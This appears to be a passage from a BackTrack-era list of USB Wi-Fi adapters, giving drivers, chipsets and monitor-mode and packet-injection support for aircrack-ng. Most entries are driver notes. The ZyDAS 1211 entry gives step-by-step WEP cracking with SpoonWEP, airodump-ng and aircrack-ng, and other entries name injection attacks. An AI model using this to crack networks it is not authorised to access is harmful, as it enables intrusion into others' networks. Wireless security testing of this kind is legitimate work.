* Nice USB Dongle. Inexpensive (<$10). Easy to antenna mod. Full capability and injection

ALFA Networks AWUS036E

* Driver : rtl8187 (mac80211, kernel >=2.6.24)/r8187 (ieee80211, kernel <=2.6.24)
* Chipset : Realtek 8187L
* For Kismet, edit your Kismet.conf to “source=rt8180,wlan0,ALFA”

* Notes : You can turn this device to go ~300mW but do be warned that this may damage your device. Also WPA under this mode is not supported.

ALFA Networks AWUS036H

* Driver : rtl8187 (mac80211, kernel >=2.6.24)/r8187 (ieee80211, kernel <=2.6.24)
* Chipset : Realtek 8187L
* For Kismet, edit your Kismet.conf to “source=rt8180,wlan0,ALFA”

This card works out of the box including injection with BackTrack3.

* Notes : There is a common misconception with regards to this device requiring two USB connectors. This device does not exactly need both USB connectors plugged in for it to work. The only reason why it was provided with two USB connectors is because of an instance whereby a person uses either an unpowered USB hub and/or the output from the computer’s USB port is inadequate (very rare case for computers to do that, most do power their USB ports) and with other USB devices hooked onto either the unpowered USB hub or computer’s USB ports there may not be enough power for the USB network dongle to work. So having the second USB connector plugged in gives the USB network dongle a slightly upper hand advantage in being provided with more power.

ALFA Networks AWUS036S

* Driver : rt73
* Chipset : Ralink RT73

This card works out of the box including injection with BackTrack3. You will need to ifconfig device up before you can set monitor mode, etc.
ASUS WL-167G

* Driver : rt73 (older version rt2570)
* Chipset : rt2571WF (older verson Ralink 2570)

Notice : Range is moderate but both monitor mode and injection work perfectly. Injects IV’s at a very slow rate (about 300-500 IV’s per minute), taking about 35 hours to collect 1,000,000 IV’s.
AVM Fritz!Wlan USB V1.1

* Driver : ndiswrapper
* Chipset :Texas Instrument TNetW1450
* Notice : NdisWrapper will never work with Aircrack-ng Suite

Notice : Works fine even with WPA/WPA2 encryption.Used ndiswrapper version 1.39 and the windows drivers from the cd.
Belkin F5D7050 V1

* Driver : rt2570
* Chipset : rt2571F

Worked fine upon boot. My version 3 card did not go into monitor mode.

Later versions (don’t know which ones) use the bcm43xx chipset from broadcom. ‘modprobe bcm43xx’ then ‘ifconfig -a’ you will see your adapter as ethX

*
o It will not inject packets **

Belkin F5D7050 (4000 series)

* Driver : zd1211rw
* Chipset : zd1211b

Upon boot, works fine in monitor mode but doesn’t inject packets. However, if you patch the kernel following the instructions at [8], packet injection works great. After patching, all of the various attacks (fragementation, chopchop, arp replay, fakeauth) work fine with aircrack-ng.
Belkin F5D7050B

* Driver : rt73
* Chipset: Ralink 2570

Works fine on boot including packet injection.

* Notes: FCC ID k75-f5d7050b is reported to not being able to detect APs, possibly due to different radio chip.

Belkin F5D7050E

* Driver : rtl8180 (mac80211 stack)
* Chipset: Realtek RTL8187B
* FCCID : K7SF5D7050E

You will need compat-wireless2.6 along with rtl8180 driver to get this working.
Belkin F5D7051

* Driver : rt73+rt2570/rndis_wlan (mac80211_stack)
* Chipset: rt2570/bcm4320

Belkin have changed the chipset that they use in the usb adapters apparently. They now use the bcm4320 chipset instead of the rt2570. The bcm4320 drivers will only work with rndis_wlan which requires mac80211. There will probably be no support for rndis_wlan in terms of monitoring/injecting.

Owners of the older version of the hardware (with rt2570) are recommended to use serialmonkey’s/ASPj’s driver which should already be included in the backtrack.
Buffalo Airstation G54 WLI-U2-KG54-AI (2A)

* Driver : rt2570
* Chipset : Ralink 2570

Chiefmax

* Driver : RT73
* Chipset : rt2571WF

D-Link DWL 122 (USB) F/W 3.2.1 H/W A1

* Driver : wlan-ng
* Chipset : prism 2.5
* Notice : There are drivers for injection however they only work on 2.6.11 kernels or older.

D-Link DWL G122 (USB) F/W 2.03 B1

* Driver : rt2570
* Chipset : Ralink 2570
* lsusb : Bus 1 Device 3: ID 2001:3c00 D-Link Corp. [hex] DWL-G122 802.11g rev. B1 [ralink]
* Notice : rev. C1 uses [ralink] RT73

This dongle must be tweaked if u want to inject with it. Additionally, its covering is very limited, recommended a cantenna!!!

Rev B1 users read here VERY IMPORTANT (credit goes to allelectrix from aircrack-ng forum)
D-Link WUA-1340

* Chipset: Ralink 2571 (RT73)
* Driver : rt73
* Chipset : Ralink
* Notice : Follow instructions for using driver with aircrack-ng: http://www.aircrack-ng.org/doku.php?id=rt73

Edimax EW-7317UG

* Driver: zd1211rw
* Chipset: zd1211
* Notice: After updating aircrack suite to aircrack-ng 1.0 dev. Monitor mode and packet injection supported.

Edimax EW-7318USG

* Driver : rt73
* Chipset : Ralink
* Notice : Follow instructions for using driver with aircrack-ng: http://www.aircrack-ng.org/doku.php?id=rt73

Hawking HWUG1

* Driver: rt73
* Chipset: ralink
* Injection and monitor mode work fine, just have to “ifconfig rausb0 up” and it works

Hawking HWU8DD

* Driver: Rev. A: unknown Rev.B: zd1211rw
* Chipset: Rev. A: zd1211 (not supported) Rev. B: zd1211b (supported)
* lsusb: Rev. A: unknown Rev. B: 0ace:1215 ZyDAS WLA-54L WiFi?
* Credits: Talkie Toaster/openxs

The only way to tell the difference between Rev. A and Rev B. is by the sticker on the actual device (on the bottom) or the actual CD. Apart from that, on the box/packaging it would have vista ready sticker for Rev. B
Linksys WUSB54g v4

* Driver : rt2570
* Chipset : Ralink 2570

No problems with any injection (kismet, airodump…). Very good USB dongle.

Does not capture WPA/WPA2 handshake.Update driver to v.1.6.0

Extremely easy to antenna mod.

Linksys WUSB54g v4 users read here VERY IMPORTANT (credit goes to allelectrix from aircrack-ng forum)
Linksys WUSB54GC

* Driver : RT73
* Chipset : Ralink Technology, Corp. 802.11b/g WiFi
* Notice 1: The interface is named rausb0, not eth0 or ath0 etc.
* Notice 2: Built-in [BackTrack] Driver does not support fragmentation attack; however, the following driver does:

http://homepages.tu-darmstadt.de/~p_larbig…z-2.0.1.tar.bz2

Needs activation before use

bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor

Everything works out of the BT3 box!
Linksys WUSB600N

* Driver : rt2870 (modified by hirte and nemesis)
* Chipset : Ralink rt2870 a/b/g/n

You will need kernel.lzm and to compile the included driver from the link above.
MicroEdge MEG55A Wireless-G USB Dongle

* Driver : rt2570
* Chipset : Ralink rt2570
* Notice : Works fine out of the box. airmon-ng start rausb0 kicked straight into monitor mode, successfully reinjects packets while monitoring.

NetGear MA111

* Driver : wlan-ng (requires patched version which cannot be used on kernels > 2.6.20)
* Chipset : Intersil Prism 2.5
* FCC ID: PY3MA111 (links to M4Y-00735)
* lsusb: 0846:4110

This is a very old device that will never be supported for the time being. Users can read here
NetGear WG111v2

* Driver : rtl8187 (mac80211, kernel >=2.6.24)/r8187 (ieee80211, kernel <=2.6.24) // p54 (mac80211)
* Chipset : Realtek RTL-8187L // Intersil-Conexant GW3887
* FCC ID : PY305400026 // PY3WG111V2

Be careful not all wg111v2 sticks have the realtek chipset the v2 with the word netgear set into the stick. To verify the differences, type `lsusb’ when you have the device connected. Apparently, older versions of this card is equipped with Conexant and the later versions are with Realtek. There has been no easy way of identifying the difference between the two apart from checking the FCC ID or via plugging it in.

* USB ID: 0846:6a00 is Realtek RTL-8187L chipset
* USB ID: 0846:4240 is Intersil/Conexant GW3887 chipset

* RTL8187L users : Drivers are available on the forum however the range on this card in my opinion is poor.
* GW3887 users : Use p54usb driver. You will need firmware for this and the current status for monitoring/injection is unknown.

NetGear WG111T

* Driver : ndiswrapper
* Chipset : Atheros AR2112A-00
* FCC ID: PY3WG111T
* Notice : NdisWrapper will never work with Aircrack-ng Suite

You can breath life to your small USB-WG111T by doing the next steps:
1)Download and extract the driver (using wine?) from Netgear
As of 2008-03-29, driver 2.1 is here: http://kbserver.netgear.com/release_notes/d103172.asp
2)change to root shell ‘sudo su -‘
3)rmmod ndiswrapper
4)ndiswrapper -i netwg11t.inf
4)modprobe ndiswrapper
5)iwconfig

Netopia ter/gusb-e

* Driver : rt2570
* Chipset : Ralink Technology, Corp. 802.11g WiFi
* Notice : works fine as i know

OvisLink Evo-w54usb

* Driver : rt2570
* Chipset : Ralink 2570
* Notice : injection works, just have to “ifconfig rausb0 up” before anything

Rosewill RNX-G1(W)

* Driver : rtl8187 (mac80211, kernel >=2.6.24)/r8187 (ieee80211, kernel <=2.6.24)
* Chipset : Realtek 8187L
* Notice : Works right out of the box on BT2 and BT3, enable monitor mode with airmon-ng.

SafeCom SWMULZ-5400

* Driver : zd1211rw
* Chipset : zd1211b
* Notice : Works with packet injection with new patch found in aircrack-ng 0.8

TP-Link TL-WN321G

* Driver : rt73
* Chipset : Ralink Technology, Corp. RT2501USB Wireless Adapter
* Notice : At first I plugged this in to my computer,and it didn’t work. airodump-ng rausb0 showed no APs detected. Updating to the latest driver made this work. Once I got this card working, it detected more AP’s than my WMP54G and my Netgear WG111v2, injected as well as either, but did not report Power properly.

Here are the steps to update the driver and make this card work:

Download the latest driver from http://homepages.tu-darmstadt.de/~p_larbig/wlan/
As of 2009-04-16, the latest driver is 3.0.2
http://homepages.tu-darmstadt.de/~p_larbig…z-3.0.2.tar.bz2

ifconfig rausb0 down
airdriver-ng remove 31
tar xvjf rt73-k2wrlz-3.0.2.tar.bz2
cd rt73*/Module
make
make install
modprobe rt73
ifconfig rausb0 up

WIFI-Link WL-USB-RSMA

* Driver: zd1211rw
* Chipset zd1211b
* lsusb: 0ace:1215
* FCC ID: ???

Tested to work on bt2 and bt3. With bt2 there’s issues with airodump-ng as it sometimes output garbled letters in various fields notably in the ESSID section. In bt3 the issue is fixed but it drops the packets out instead of properly processing them, something to do with rate limiting.

ZyDAS 1211

* Driver : zd1211rw
* Chipset : ZyDAS Chipset

* Notice 1 (properly for BT2): For basic functionality, you need to get the firmware from [here], untar it to /usr/lib/firmware/ – reinsert the card and the firmware should load OK. Addendum: I had to unzip to /lib/firmware/zd1211, but after that it worked fine.

* Notice 2 (for BT3): Test with 1211b / Lutec USB Stick:

Works out of the box in monitoring mode, runs as eth1 (on my box, yours may differ). Injection is possible without any driver or kernel modding, but ONLY with SpoonWEPs POS801 attack (didn´t find the according aireplay mode, airreplay standalone DID NOT work!). Besides, for me WEP cracking did only work like this – but then without any problems:

a.) “airodump-ng eth1”, get bssid, close it

b.) start SpoonWEP. It´s only used for starting the correct airreplay mode.

c.) Select 2nd Attack Option (POS801..), this is the ONLY attack-mode which will work with 1211b!

d.) Close SpoonWEP`s WS-Dump window, keep SpoonWEP`s Mainwindow = aireplay thread running

e.) start airodump-ng again, dump data traffic now

f.) start aircrack-ng manually

g.) you are done!

for more help with the commands check: http://blip.tv/file/930698/

Conclusion: not perfect, but cheap USB-Dongle WEP-Cracking out of the box – without any patching – if u know what to do.

-> *NOOB-Compatibility Award*

Still, Realtek-USB-Chipset more recommended if u can find it, can run SpoonWEP without any hacks.
SMCWUSB-G EU

* Appears to use a ZD1211 chipset.

MSI US54SE

Version 1

* Appears to use a ZD1211 chipset.

Version 2

* Uses rt73 chipset.
* Notice: This particular rt73-Version is not supported, yet.